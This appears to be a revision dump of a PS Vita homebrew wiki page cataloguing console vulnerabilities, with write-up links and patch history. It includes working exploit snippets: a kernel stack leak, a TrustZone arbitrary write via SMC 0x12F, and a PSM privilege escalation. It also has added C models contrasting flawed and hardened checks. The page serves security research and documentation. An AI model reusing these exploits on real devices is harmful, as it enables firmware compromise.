When passed proper arguments, sceNetSyscallIoctl will execute a function from the socket's vtable at the end:<br />
<br />
<source lang ="C"><br />
v13 = (*(int (__fastcall **)(int, signed int, unsigned int, char *))(*(_DWORD *)(socket + 24) + 28))(<br />
socket,<br />
11,<br />
flags_,<br />
mem_);<br />
</source><br />
<br />
Fixed in 3.63. See [https://blog.xyz.is/2017/363-fix.html how it was fixed].<br />
<br />
=== 3 kernel exploits on DevKit by TheFloW ===<br />
<br />
Patched in 3.68 or in FWs just before. These exploits are not usable on retail/testkit because the functions used are exported only by DevKit modules.<br />
<br />
==== Kernel stack leak in sceMotionDevGetEvaInfo ====<br />
<br />
This can be used to defeat kernel ASLR on DevKit on FW < 3.68.<br />
<br />
<source lang="C"><br />
uint32_t get_sysmem_base() {<br />
uint32_t info[0x12];<br />
<br />
// 1) Call a function that writes sp to kernel stack<br />
sceAppMgrLoadExec(NULL, NULL, NULL);<br />
<br />
// 2) Leak kernel stack<br />
sceMotionDevGetEvaInfo(info);<br />
<br />
// 3) Get sysmem base<br />
uint32_t sysmem_addr = info[0] & 0xFFFFF000;<br />
<br />
return sysmem_addr;<br />
}<br />
</source><br />
<br />
==== sceNgsVoiceDefinitionGetPresetInternal can read kernel memory ====<br />
<br />
See full exploit code by TheFloW [https://gist.github.com/TheOfficialFloW/92d4c2ad84b325019f68bc1c57cc64e2 here].<br />
<br />
Also reimplemented by CelesteBlue [https://github.com/CelesteBlue-dev/PSVita-RE-tools/blob/master/Kdumper/src/main.c#L342 here].<br />
<br />
==== sceKernelGetMutexInfo_089 can write into kernel memory ====<br />
<br />
No PoC available.<br />
<br />
=== SceNgs design flaws (h-encore) ===<br />
<br />
Discovered on 2018-02-04 by TheFloW and successfully exploited four days later. Released on 2018-06-29 in h-encore by TheFloW.<br />
<br />
Should be exploitable at least on 3.00 and up to 3.68. Fixed in 3.69.<br />
<br />
Some functions in [[SceNgs]] take a kernel pointer (XORed with a known static value) from the user.<br />
<br />
This can be used to partially defeat kASLR and also as an out-of-bounds exploit to get kernel execution.<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md Writeup] and [https://github.com/TheOfficialFloW/h-encore source code].<br />
<br />
==== Kernel stack address leak using sceNgsRackGetRequiredMemorySize ====<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#getting-the-kernel-stack-base-address Write-up about h-encore kstack leak].<br />
<br />
IMPORTANT: On old firmwares (at least until firmware 1.692) the voice definition address must not be XORed, or SCE_NGS_ERROR_INVALID will be returned by sceNgsRackGetRequiredMemorySize.<br />
<br />
Below is a working implementation tested on firmware 0.995 and 1.692 (using the 1.692 DEVCTL_STACK_FRAME value gets the kstack address faster on that firmware).<br />
<br />
<source lang="cpp"><br />
#define DEVCTL_STACK_FRAME 0x728 // value specific to 1.692<br />
<br />
SceInt32 gRet = 0; // last return value of sceNgsRackGetRequiredMemorySize, kept for debugging<br />
<br />
SceUInt32 findkstackaddr(SceNgsHSynSystem synSys, SceUInt32 paramsize)<br />
{ // exploit and ROP code by TheFloW - C code by LemonHaze<br />
    SceInt32 ret = 0;<br />
<br />
    SceNgsRackDescription rackDesc;<br />
    rackDesc.nChannelsPerVoice = 1;<br />
    rackDesc.nVoices = 1;<br />
    rackDesc.nMaxPatchesPerInput = 0;<br />
    rackDesc.nPatchesPerOutput = 1;<br />
<br />
    // fake voice definition, passed through sceIoDevctl so that a copy of it lands on the kernel stack<br />
    unsigned int voiceDef[0x400];<br />
    memset(voiceDef, 0x00, 0x400);<br />
    voiceDef[0] = SCE_NGS_VOICE_DEFINITION_MAGIC;<br />
    voiceDef[1] = SCE_NGS_VOICE_DEFINITION_FLAGS;<br />
    voiceDef[2] = 0x40;<br />
    voiceDef[3] = 0x40;<br />
    sceIoDevctl("", 0, voiceDef, 0x3FF, NULL, 0);<br />
<br />
    sceKernelDelayThread(2*1000*1000);<br />
<br />
    // probe candidate kernel stack pages; on these old firmwares the address is passed un-XORed<br />
    for (unsigned int addr = DEVCTL_STACK_FRAME; addr < 0x3000000; addr += 0x1000)<br />
    {<br />
        rackDesc.pVoiceDefn = (struct SceNgsVoiceDefinition*)(addr);<br />
        ret = sceNgsRackGetRequiredMemorySize(synSys, &rackDesc, &paramsize);<br />
        gRet = ret;<br />
        if (ret == SCE_NGS_ERROR_INVALID_PARAM)<br />
            continue;<br />
        else<br />
            return (addr - DEVCTL_STACK_FRAME); // the fake definition was found: subtract its frame offset<br />
    }<br />
    return 0xFFFFFFF; // not found<br />
}<br />
</source><br />
<br />
=== 2 memcpy bugs (used in h-encore) ===<br />
<br />
Discovered by TheFloW.<br />
<br />
Should be exploitable on any firmware up to 3.69. Could even be vulnerable at other levels (TrustZone?, NS KBL?).<br />
<br />
[https://github.com/TheOfficialFloW/h-encore/blob/master/WRITE-UP.md#memcpy-or-more-like-memecpy write-up]<br />
<br />
The two following bugs are exploited by calling memcpy with a negative length, in order to get an out-of-bounds access without an overly large copy and without triggering a segmentation fault.<br />
<br />
==== memcpy integer overflow ====<br />
<br />
If len is negative, adding it to dst yields a value smaller than dst due to integer overflow; as a consequence, the comparison later in the code evaluates to false whether it is a signed or an unsigned comparison, and memcpy believes there are fewer than 32 bytes to copy.<br />
<br />
==== memcpy length comparison as signed integer ====<br />
<br />
At some point in the memcpy function, the length is compared as a signed integer. Hence a negative length simply bypasses the copy loop.<br />
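<br />
Added example (not from the h-encore write-up and not Sony's memcpy): a constructed C model of the two checks described in the two subsections above, beside the same checks rewritten so that a negative or wrapping length is rejected. <code>plan_flawed</code> reproduces both defects (the wrapping <code>dst + len</code> comparison and the signed tail-loop bound), <code>plan_safe</code> is the hardened form; the function names, the 32-byte bulk-path threshold and the <code>dst_end</code> bound are assumptions of this model.<br />
<br />
```c
#include <stdint.h>
#include <stdbool.h>

/* Constructed model of a memcpy prologue: how many bytes the 32-byte block
 * path and the byte-by-byte tail loop would each copy. Not Sony's code. */
typedef struct {
    uint32_t bulk_bytes;   /* bytes the 32-byte-block path would copy */
    uint32_t tail_bytes;   /* bytes the byte-by-byte tail loop would copy */
} copy_plan_t;

/* Flawed: 'len' is a signed int. end = dst + len wraps below dst when len is
 * negative (bug 1), so the "at least 32 bytes?" test fails and the bulk path
 * is skipped; the tail loop then compares its counter with len as a signed
 * value (bug 2), so nothing at all is copied for a negative length. */
static copy_plan_t plan_flawed(uint32_t dst, int32_t len)
{
    copy_plan_t p = {0u, 0u};
    uint32_t end = dst + (uint32_t)len;          /* bug 1: wraps for len < 0 */
    if (end >= dst + 32u)                        /* false after the wrap */
        p.bulk_bytes = (uint32_t)len & ~31u;
    for (int32_t i = (int32_t)p.bulk_bytes; i < len; i++)   /* bug 2: signed */
        p.tail_bytes++;
    return p;
}

/* Hardened: an unsigned length, an explicit check that dst + len cannot wrap,
 * and a bound on the destination object so the copy cannot leave it. */
static bool plan_safe(uint32_t dst, uint32_t len, uint32_t dst_end, copy_plan_t *out)
{
    if (len > UINT32_MAX - dst) return false;    /* dst + len would wrap */
    if (dst + len > dst_end) return false;       /* copy would run past the object */
    out->bulk_bytes = len & ~31u;
    out->tail_bytes = len - out->bulk_bytes;
    return true;
}

/* Total bytes the flawed model would copy. */
static uint32_t flawed_total(uint32_t dst, int32_t len)
{
    copy_plan_t p = plan_flawed(dst, len);
    return p.bulk_bytes + p.tail_bytes;
}

/* Total bytes the hardened model would copy, or UINT64_MAX when it rejects. */
static uint64_t safe_total(uint32_t dst, uint32_t len, uint32_t dst_end)
{
    copy_plan_t p;
    if (!plan_safe(dst, len, dst_end, &p)) return UINT64_MAX;
    return (uint64_t)p.bulk_bytes + p.tail_bytes;
}
```
<br />
With <code>len = -16</code> the flawed model copies nothing, which is exactly the property the exploit relies on; the hardened model never reaches a copy loop with a length that could wrap, because the wrap test is done on the unsigned operands before any pointer arithmetic.<br />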
<br />
=== Kernel stack leak in sceUdcdGetDeviceInfo ===<br />
<br />
Discovered on 2018-10-09 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#stack-disclosure writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
=== Heap overflow in WLAN command 0x50120004 ===<br />
<br />
Discovered on 2018-09-26 by TheFloW. Implemented in Trinity by TheFloW.<br />
<br />
[https://theofficialflow.github.io/2019/06/18/trinity.html#heap-overflow writeup]<br />
<br />
Fixed on 3.71.<br />
<br />
== Non-secure Boot Loader (NSBL) ==<br />
<br />
=== Ensō ===<br />
<br />
Released on 2017-07-29 by Team Molecule. Patched in 3.67.<br />
<br />
[https://yifan.lu/2017/07/31/henkaku-enso-bootloader-hack-for-vita yifan's write-up]<br />
<br />
[https://github.com/henkaku/enso enso source code]<br />
<br />
==== Buffer overflow during eMMC init ====<br />
<br />
2016 - Yifan Lu discovers a buffer overflow in NSBL that occurs during eMMC initialization. With kernel execution, the eMMC MBR can be modified to change the block size. However, at this time yifan was trying to exploit it with an adjacent malloc (controlled_size), couldn't find a way, and so left it there.<br />
<br />
==== Logic flaw about error checking ====<br />
<br />
2017-04-30 - xyx finds a way to exploit the NSKBL eMMC buffer overflow. He discovers a logic flaw related to error code propagation in NSKBL. A function does not check a error return: if it did then the corrupted value in buffer overflow would not have been used. And later on the field that was written was used in a separate call.<br />
<br />
It so allows for a usable buffer overflow in the data section and early code execution on ARM in non-secure privileged mode.<br />
<br />
== [[Secure_World|Secure World (TrustZone)]] ==<br />
<br />
A list of the 1.80 TrustZone modules' imports/exports is available: [[File:Psvita_1.80_tz_nids.txt]]<br />
<br />
=== SMC 0x12F does not validate arguments (arbitrary read/write and code execution) ===<br />
<br />
Discovered on 2017-01-01 by Mike H. No public implementation except in write-up.<br />
<br />
[https://hexkyz.blogspot.com/2017/02/the-aftermath-tale-of-secure-worlds.html?m=1 writeup by Mike H.]<br />
<br />
See also [[SceSblSmschedProxy#sceSblSmSchedProxyGetStatusForKernel|sceSblSmSchedProxyGetStatusForKernel]].<br />
<br />
SMC 0x12F (sceSblSmSchedGetStatusMonitorCall) takes two unchecked arguments: <code>sm_handle</code> and <code>shared_mem_index</code>.<br />
<br />
<code>sm_handle</code> is a pointer to TrustZone memory in the form of <code>(tz_addr >> 0x01)</code> and <code>shared_mem_index</code> is an integer value calculated as <code>((shared_mem_blk_addr - shared_mem_base_addr) / 0x80)</code>.<br />
<br />
By passing the right value as <code>sm_handle</code>, SMC 0x12F will read 0x08 bytes from <code>(tz_addr + 0x28)</code> and return them at <code>(shared_mem_base_addr + index * 0x80)</code> which translates to a TrustZone arbitrary memory leak (0x08 bytes only).<br />
<br />
By passing the right value as <code>shared_mem_index</code> it is also possible to write the leaked data into an arbitrary TrustZone memory region.<br />
The Non-secure Kernel sees the shared memory region at <code>0x00400000</code> (size is 0x5000 bytes) and the Secure Kernel sees the exact same memory region at <code>0x00560000</code>, thus making it possible to plant data inside the Non-secure Kernel's region and have the SMC copy this data somewhere into TrustZone memory (e.g. the SMC table). This results in TrustZone-level arbitrary code execution.<br />
<br />
Example code exploiting this vulnerability for writing 8 bytes from Non-secure Kernel to TrustZone:<br />
<br />
<source lang="c"><br />
#include <stdint.h><br />
#include <string.h><br />
<br />
/* Copies 8 bytes from Non-secure Kernel memory to TrustZone address dst. */<br />
void tz_memcpy_8(uintptr_t dst, const void *src)<br />
{<br />
    /* stage the data at shared_mem_base + 0x28 (Non-secure view): with sm_handle<br />
     * pointing at the shared region itself, that is where the SMC reads from */<br />
    memcpy((void *)0x00400028, src, 8);<br />
<br />
    /* sm_handle is the Secure-view address of the shared region, shifted right by one */<br />
    uintptr_t sm_handle = 0x00560000 >> 1;<br />
    /* shared_mem_index selects the 0x80-byte slot whose address equals dst */<br />
    uintptr_t shared_mem_index = (dst - 0x00560000) / 0x80;<br />
<br />
    asm volatile(<br />
        "mov r0, %0\n\t"<br />
        "mov r1, %1\n\t"<br />
        "mov r12, #0x12F\n\t"<br />
        "smc #0\n\t"<br />
        : : "r"(sm_handle), "r"(shared_mem_index)<br />
        : "r0", "r1", "r12", "memory" /* r0/r1 listed so the compiler never places an input there */<br />
    );<br />
}<br />
</source><br />
<br />
To achieve code execution, dst must be set to the SMC table address in order to plant 2 pointers (8 = 2*4 bytes).<br />
<br />
Patched somewhere after 1.80 and before 2.10.<br />
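<br />
Added example, not Sony's handler and not part of the write-up: a C model of how SMC 0x12F decodes its two arguments, beside the validation the handler lacked. The shared-region addresses, slot size, 0x28 read offset and 8-byte length are the values stated above; the secure-module pool bounds (<code>SM_POOL_START</code>/<code>SM_POOL_END</code>) are placeholders for whatever range a real check would take from the module list, and the function names are this example's own.<br />
<br />
```c
#include <stdint.h>
#include <stdbool.h>

/* Values taken from the description above. */
#define SHM_BASE_TZ   0x00560000u  /* shared region, Secure Kernel view */
#define SHM_SIZE      0x5000u
#define SHM_SLOT      0x80u
#define SM_STATUS_OFF 0x28u        /* the 8 bytes the SMC reads from the handle */
#define STATUS_LEN    8u

/* Placeholders, not from the page: a range in which legitimate secure-module
 * objects live. A real check would consult the secure module list instead. */
#define SM_POOL_START 0x00500000u
#define SM_POOL_END   0x00540000u

typedef struct { uint32_t src; uint32_t dst; } smc_copy_t;

/* Argument encoding as the text describes it. */
static uint32_t handle_for(uint32_t tz_addr) { return tz_addr >> 1; }
static uint32_t index_for(uint32_t dst)      { return (dst - SHM_BASE_TZ) / SHM_SLOT; }

/* Unchecked decoding: any handle yields a source, any index yields a slot,
 * which is the arbitrary read and write described above. */
static smc_copy_t decode_unchecked(uint32_t sm_handle, uint32_t index)
{
    smc_copy_t c;
    c.src = (sm_handle << 1) + SM_STATUS_OFF;
    c.dst = SHM_BASE_TZ + index * SHM_SLOT;
    return c;
}

/* Same decoding with the checks that keep both addresses inside their
 * intended regions: the handle must name an object in the module pool, and
 * the index must select one of the SHM_SIZE / SHM_SLOT (0xA0) real slots. */
static bool decode_checked(uint32_t sm_handle, uint32_t index, smc_copy_t *out)
{
    if (sm_handle >> 31) return false;                 /* top bit would be shifted out */
    uint32_t tz_addr = sm_handle << 1;
    if (tz_addr < SM_POOL_START ||
        tz_addr + SM_STATUS_OFF + STATUS_LEN > SM_POOL_END) return false;
    if (index >= SHM_SIZE / SHM_SLOT) return false;    /* destination must stay in the region */
    out->src = tz_addr + SM_STATUS_OFF;
    out->dst = SHM_BASE_TZ + index * SHM_SLOT;
    return true;
}

/* Scalar helpers for checking the checked decoder. */
static bool checked_accepts(uint32_t sm_handle, uint32_t index)
{
    smc_copy_t c;
    return decode_checked(sm_handle, index, &c);
}

/* Destination the checked decoder would write to, or 0 when it rejects. */
static uint32_t checked_dst(uint32_t sm_handle, uint32_t index)
{
    smc_copy_t c;
    return decode_checked(sm_handle, index, &c) ? c.dst : 0u;
}
```
<br />
Run against the argument pair <code>tz_memcpy_8</code> above builds (handle for the shared region, index for a destination outside it), the unchecked decoder produces the intended out-of-region write while the checked one rejects both arguments; a handle inside the pool with a small index is accepted and lands in a real slot.<br />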
<br />
== Hardware ==<br />
<br />
=== DMAC5 crypto engine allows partial AES key overwrite ===<br />
<br />
(2017-02-01) The Dmac5 crypto engine, accessible from the kernel, allows writing 4 bytes of key material at a time. This makes it possible to recover plaintext AES keys via bruteforce.<ref>https://yifan.lu/2017/02/19/psvimgtools-decrypt-vita-backups/</ref><br />
<br />
=== Bigmac leaves result of previous AES operation in the internal buffer allowing for derived key recovery ===<br />
<br />
(2017-04-21) See https://lolhax.org/2019/01/02/extracting-keys-f00d-crumbs-raccoon-exploit/<br />
<br />
=== Petite Mort ===<br />
<br />
(2018-07-27) jebaited, not an exploit. Just [https://github.com/TeamMolecule/petite-mort tools used to glitch bootrom].<br />
<br />
=== F00D exception vectors reused as SLSK load buffer ===<br />
<br />
(2018-07-27) When an [[Enc]] is loaded by the bootrom, it is first read to <code>0x40000</code>, which is the uncached alias of <code>0x800000</code> (both are F00D-only private memory), and then later decrypted to the final address it is executed from. However, <code>0x40000</code> is also where the exception vectors lie. By the time the SLSK is read, the exception vectors are stale and therefore the memory is safe to reuse. Interrupts are disabled, so we cannot use those. Exceptions, however, cannot be disabled in hardware. Unfortunately, there is no way to trigger any exception from bootrom code (which is why Sony thought it would be safe to re-use the buffer). Below is a summary of all the exceptions and why they are not possible.<br />
<br />
{| class="wikitable"<br />
! Exception<br />
! Offset<br />
! Reason<br />
|-<br />
| Reset<br />
| 0x0<br />
| Requires hardware reset signal<br />
|-<br />
| NMI<br />
| 0x4<br />
| Requires hardware NMI signal<br />
|-<br />
| RI<br />
| 0x8<br />
| No reserved instructions used<br />
|-<br />
| ZDIV<br />
| 0xC<br />
| DIV/DIVU instructions are used in one place but safe from /0 bugs<br />
|-<br />
| BRK<br />
| 0x10<br />
| BRK instruction not used<br />
|-<br />
| SWI<br />
| 0x14<br />
| SWI/STC instructions not used<br />
|-<br />
| DSP<br />
| 0x18<br />
| No DSP unit<br />
|-<br />
| COP<br />
| 0x1C<br />
| No coprocessor unit<br />
|}<br />
<br />
However, through [[Glitching]], we can inject a fault in either the decoding or execution units of the processor and trigger one of these exceptions. By writing a fake ENC file that actually masquerades as a F00D exception handler table whose entries all point to our payload, we can execute F00D code at bootrom time (before bootrom is unmapped). This is a very desirable glitching target because it requires almost no precision (any instruction anywhere can be "corrupted" into something that triggers an exception) and allows for "spray and pray" style glitch attacks. In practice, we found this target to have an insanely high success rate.<br />
<br />
In the bootrom there are two SLSK load paths. The first one is used at initial boot to read [[Second Loader]] from the eMMC. In this path, the minimum payload size is 0x200 bytes because at least one eMMC block must be read. The second path is used in early boot to read the [[Secure Kernel]] ENC, which is loaded from the [[SLB2]] partition by the ARM TZ processor to volatile memory. This second path is more difficult to reach because it requires a handshake between F00D ("you are allowed to reset me") and ARM TZ ("I am going to reset F00D"). However, as long as both F00D and ARM TZ are pwned post-boot, the second path can be triggered.<br />
<br />
The advantage of the first path is that it is easier and faster to trigger (always hits on first boot). The disadvantages are that it corrupts the first 0x200 bytes of F00D memory (which we might want to dump) and that it requires "bricking" the device (because second loader is replaced by our payload). Note that with a proper hardware flasher and a backup beforehand, it is possible to unbrick a corrupted second loader.<br />
<br />
The advantage of the second path is that it does not require a hardware flasher and that it only corrupts 0x40 bytes of F00D memory. The disadvantage is that it requires more work to trigger (code execution both in ARM TZ and F00D) and it takes longer to trigger (since you have to boot the system to a point where you can pwn F00D and ARM TZ).<br />
<br />
=== Boot ROM Enc buffer overflow ===<br />
<br />
(2019-08-30) The development boot ROM does not check the [[Enc]] header correctly. Specifically, the "code size" field (at offset 0x10) is only checked after adding it to "offset to code". The calculation can overflow, for example, when <code>code_size == -offset_code</code>. Further, when loading an Enc binary from ARM, the size to copy in is calculated as <code>(scratch->code_size + scratch->offset_code) - 0x40</code>. Since the sum of code_size and offset_code is now 0, this calculation underflows to -0x40, i.e. 0xffffffc0, resulting in a huge amount of data being copied in and overwriting parts of the boot ROM.<br />
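<br />
Added example, not the boot ROM's code: a constructed Enc header check in C that reproduces the flawed sum-only validation and a hardened version that validates each field before adding. The 0x10 offset of the code size field and the 0x40 header subtraction come from the text; the position of the "offset to code" field (<code>ENC_OFF_CODE_AT</code>), the little-endian layout and the function names are assumptions of this example.<br />
<br />
```c
#include <stdint.h>
#include <stdbool.h>
#include <string.h>

#define ENC_HEADER_LEN   0x40u   /* header bytes subtracted from the copy, from the text */
#define ENC_CODE_SIZE_AT 0x10u   /* "code size" field offset, from the text */
#define ENC_OFF_CODE_AT  0x0Cu   /* assumed position of "offset to code"; not from the page */

typedef struct {
    uint32_t offset_code;
    uint32_t code_size;
} enc_hdr_t;

static uint32_t rd32le(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

static void wr32le(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* Build a constructed 0x40-byte header carrying the two fields. */
static void enc_build(uint8_t hdr[ENC_HEADER_LEN], uint32_t offset_code, uint32_t code_size)
{
    memset(hdr, 0, ENC_HEADER_LEN);
    wr32le(hdr + ENC_OFF_CODE_AT, offset_code);
    wr32le(hdr + ENC_CODE_SIZE_AT, code_size);
}

static enc_hdr_t enc_parse(const uint8_t hdr[ENC_HEADER_LEN])
{
    enc_hdr_t h;
    h.offset_code = rd32le(hdr + ENC_OFF_CODE_AT);
    h.code_size   = rd32le(hdr + ENC_CODE_SIZE_AT);
    return h;
}

/* Flawed: only the sum is range-checked. code_size == -offset_code wraps the
 * sum to 0, which passes, and the subtraction then underflows to 0xffffffc0. */
static bool copy_len_flawed(const uint8_t hdr[ENC_HEADER_LEN], uint32_t max_total, uint32_t *copy_len)
{
    enc_hdr_t h = enc_parse(hdr);
    uint32_t total = h.code_size + h.offset_code;    /* may wrap */
    if (total > max_total) return false;
    *copy_len = total - ENC_HEADER_LEN;              /* underflows when total < 0x40 */
    return true;
}

/* Hardened: bound each addend first so the addition cannot wrap, and require
 * the code to start past the header so the subtraction cannot underflow. */
static bool copy_len_safe(const uint8_t hdr[ENC_HEADER_LEN], uint32_t max_total, uint32_t *copy_len)
{
    enc_hdr_t h = enc_parse(hdr);
    if (h.offset_code < ENC_HEADER_LEN || h.offset_code > max_total) return false;
    if (h.code_size > max_total - h.offset_code) return false;   /* sum stays <= max_total */
    *copy_len = (h.offset_code + h.code_size) - ENC_HEADER_LEN;
    return true;
}

/* Copy length either checker would accept for the given fields, or UINT64_MAX when rejected. */
static uint64_t demo_copy_len(bool hardened, uint32_t offset_code, uint32_t code_size, uint32_t max_total)
{
    uint8_t hdr[ENC_HEADER_LEN];
    uint32_t copy_len = 0;
    enc_build(hdr, offset_code, code_size);
    bool ok = hardened ? copy_len_safe(hdr, max_total, &copy_len)
                       : copy_len_flawed(hdr, max_total, &copy_len);
    return ok ? (uint64_t)copy_len : UINT64_MAX;
}
```
<br />
The header with <code>offset_code = 0x100</code> and <code>code_size = 0xFFFFFF00</code> is the wrap case from the text: the flawed checker accepts it and computes a copy length of 0xffffffc0, the hardened checker rejects it at the per-field bound before any addition takes place.<br />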
<br />
== F00D Processor ==<br />
<br />
=== second_loader ===<br />
<br />
==== moth exploit ====<br />
(2019-02-05) second_loader does not check the idstorage factory firmware version padding after decryption. In order to verify the factory firmware version number, the binary blob from idstorage is decrypted using a console-specific key, verified using RSA, then decrypted again using a different console-specific key. At no point does it check that the padding of the final decryption is valid. This lets us transplant the block from one console to another by decrypting the outer layer on the donor console and encrypting it on the target. As the second key is different on the target console, after the final decryption we end up with random garbage. However, because the version number is a 4-byte integer, with a probability of 1/256 the major byte of the version will be 00, resulting in a factory firmware of "0.garbage". This effectively lets us bypass the factory firmware check implemented in second_loader and downgrade below the factory firmware, provided that enough samples of the signed blob are collected.<br />
<br />
=== secure_kernel ===<br />
<br />
==== octopus exploit ====<br />
(2017-02-18) f00d secure_kernel module loading does not check the source address and therefore provides an oracle allowing for a memory dump. See https://teammolecule.github.io/35c3-slides/<br />
<br />
Fixed in 1.80.<br />
<br />
==== Heap buffer overflow in update_service_sm ====<br />
(2017-02-23) A heap buffer overflow exists in update_service_sm.<ref>https://yifan.lu/2019/01/11/the-first-f00d-exploit/</ref><br />
<br />
== References ==<br />
<references/><br />
<br />
[[Category:Vulnerabities]]</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Vulnerabilities&diff=11506Vulnerabilities2019-09-18T23:01:37Z<p>Xyz: /* F00D Processor */</p>
<hr />
<div>== Userland ==<br />
<br />
=== WebKit exploits ===<br />
<br />
==== WebKit exploits in Email app ====<br />
<br />
Implemented by xyz, in order for HENkaku to be launched offline.<br />
<br />
See [https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup].<br />
<br />
==== WebKit 531.22.8 (Vita FW <= 1.81) (CVE-2010-4577 and CVE-2010-1807) ====<br />
<br />
There are two exploits used for WebKit prior to 2.00. One is a data leakage exploit, CVE-2010-4577 <ref>https://code.google.com/p/chromium/issues/detail?id=63866</ref>, using type confusion to treat a double as a string memory address and length. The other is a type confusion exploit, CVE-2010-1807, on the parseFloat() function using a NaN as the argument.<br />
<ref>http://imthezuk.blogspot.com/2010/11/float-parsing-use-after-free.html</ref><br />
<br />
==== WebKit 536.26 (Vita FW 2.00-3.20) (CVE-2012-3748) (PSA 2013-09-03-1) ====<br />
<br />
Ported to PSVita by many people. Patched on FW 3.30.<br />
<br />
The heap memory buffer overflow vulnerability exists within WebKit's JavaScriptCore JSArray::sort(...) method. This method accepts a user-defined JavaScript function and calls it from native code to compare array items. If this compare function reduces the array length, then the trailing array items will be written outside the "m_storage->m_vector[]" buffer, which leads to heap memory corruption.<br />
<br />
[http://packetstormsecurity.com/files/123088/ Packet Storm Exploit 2013-0903-1 - Apple Safari Heap Buffer Overflow]<br />
<br />
[https://bitbucket.org/DaveeFTW/psvita-260-webkit/src/master/ exploit code by Davee]<br />
<br />
==== WebKit 537.73 (as used in Vita FW 3.30-3.36) (CVE-2014-1303) ====<br />
<br />
Ported to PSVita by xyz. Patched on FW 3.50.<br />
<br />
The CSSSelectorList can be mutated after it is allocated. If the mutated list contains fewer entries than the original one, a restrictive 1-bit OOB write can be achieved.<br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not.PDF</ref><br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not-WP.pdf</ref><br />
<ref>https://cansecwest.com/slides/2015/Liang_CanSecWest2015.pdf</ref><br />
<br />
==== WebKit 537.73 (as used in Vita FW 3.30-3.60) (JSArray::sortCompactedVector) ====<br />
<br />
Discovered by xyz. Implemented in HENkaku by Molecule Team. Patched in FW 3.61 (see [https://blog.xyz.is/2016/webkit-360.html#bonus-how-sony-patched-it how it was patched]).<br />
<br />
The JSArray::sort method has a heap use-after-free vulnerability. If an array containing an object with a custom toString method is sorted, and the toString method causes the array to be reallocated, then the sorted elements will be written to the old freed address.<br />
<br />
[https://blog.xyz.is/2016/webkit-360.html xyz's writeup about 3.60 webkit exploit]<br />
<br />
[https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup about ROP in webbrowser]<br />
<br />
[https://github.com/henkaku/henkaku/blob/master/webkit/exploit.js 3.60 webkit exploit source code by xyz]<br />
<br />
[https://gist.github.com/St4rk/f1375a22dad6e5bbcff8067fdf26600f 3.60 webkit exploit commented code by St4rk]<br />
<br />
==== WebKit 537.73 (as used in Vita FW 3.30-3.72) (to be disclosed) ====<br />
<br />
Will be released at the same time as xyz's next PSVita kernel exploits, named 2050 and 2051. TheFloW also has a WebKit exploit, which may or may not be the same as xyz's.<br />
<br />
Working on <= 3.72. Not patched yet.<br />
<br />
=== PSM (PlayStation Mobile) exploits ===<br />
<br />
PSM apps for PSVita were removed from the PSStore in 2015. Nevertheless, a set of tricks allows installing and using PSM on any PSVita on FW <=3.51.<br />
<br />
PSM apps can't work on FW >=3.52 because they are blacklisted in PSVita OS. This can be bypassed only with a kernel exploit and the ref00d plugin.<br />
<br />
==== PSM Dev For Unity can be installed without PSStore ====<br />
<br />
PSM Dev For Unity is packed into a DRM-free .pkg. It can therefore be installed using PKG Installer, or the BGDL .pkg trick. Not patchable.<br />
<br />
==== PSM+ ====<br />
<br />
PSM developer license can be spoofed using filesystem write access and signed with keys.<br />
<br />
==== PSM Mono privilege escalation ====<br />
<br />
See [https://yifan.lu/2015/06/21/hacking-the-ps-vita/ writeup by yifan lu].<br />
<br />
==== PSM Unity privilege escalation ====<br />
<br />
UnityEngine.dll is a trusted assembly (SecurityCritical) and is not signed (can be modified). However, the actual file at <code>ux0:app/PCSI00009/managed/UnityEngine.dll</code> is [[PFS]] signed and encrypted, making this (and any) resource based hacks just as difficult as unsigned code execution hacks (which is the original goal).<br />
<br />
==== PSM NetworkRequest privilege escalation ====<br />
<br />
NetworkRequest.BeginGetResponse(AsyncCallback callback) invokes callback with <code>SecurityCritical</code> allowing for a privilege escalation. Unfortunately, Sony closed down the scoreboards feature <ref>http://community.eu.playstation.com/t5/Announcements-Events/PSM-scoreboard-service-is-closing/td-p/21263959</ref> which means that Network.AuthGetTicket() fails and Network.CreateRequest() cannot be invoked. There is no other way of creating a NetworkRequest object.<br />
<br />
<source lang="csharp"><br />
using System;<br />
using System.Security;<br />
using System.Runtime.InteropServices;<br />
using Sce.PlayStation.Core.Services;<br />
<br />
namespace NetHax<br />
{<br />
    public class AppMain<br />
    {<br />
        [SecurityCritical]<br />
        public static void Escalate (IAsyncResult result)<br />
        {<br />
            Console.WriteLine("Should be SecurityCritical");<br />
            IntPtr ptr = Marshal.AllocHGlobal(1000);<br />
            Console.WriteLine("Look at me allocating memory: 0x{0:X}", ptr);<br />
        }<br />
<br />
        public static void Main (string[] args)<br />
        {<br />
            Network.Initialize("af1c0a1b-a7b8-4597-a022-eee91e6735d1");<br />
            Network.AuthGetTicket();<br />
            NetworkRequest req = Network.CreateRequest(NetworkRequestType.Get, "", "");<br />
            IAsyncResult result = req.BeginGetResponse(new AsyncCallback(Escalate));<br />
            while (!result.IsCompleted)<br />
            {<br />
                Console.WriteLine("waiting...");<br />
            }<br />
            Console.WriteLine("Completed!");<br />
        }<br />
    }<br />
}<br />
</source><br />
<br />
=== Game savedata exploits ===<br />
<br />
Discovered in 2015 by TheFloW. Released on 2018-06-29.<br />
<br />
This sort of exploit works in theory on any firmware (not patchable, or hardly so).<br />
<br />
==== Savedata exploits VS WebKit exploits ====<br />
<br />
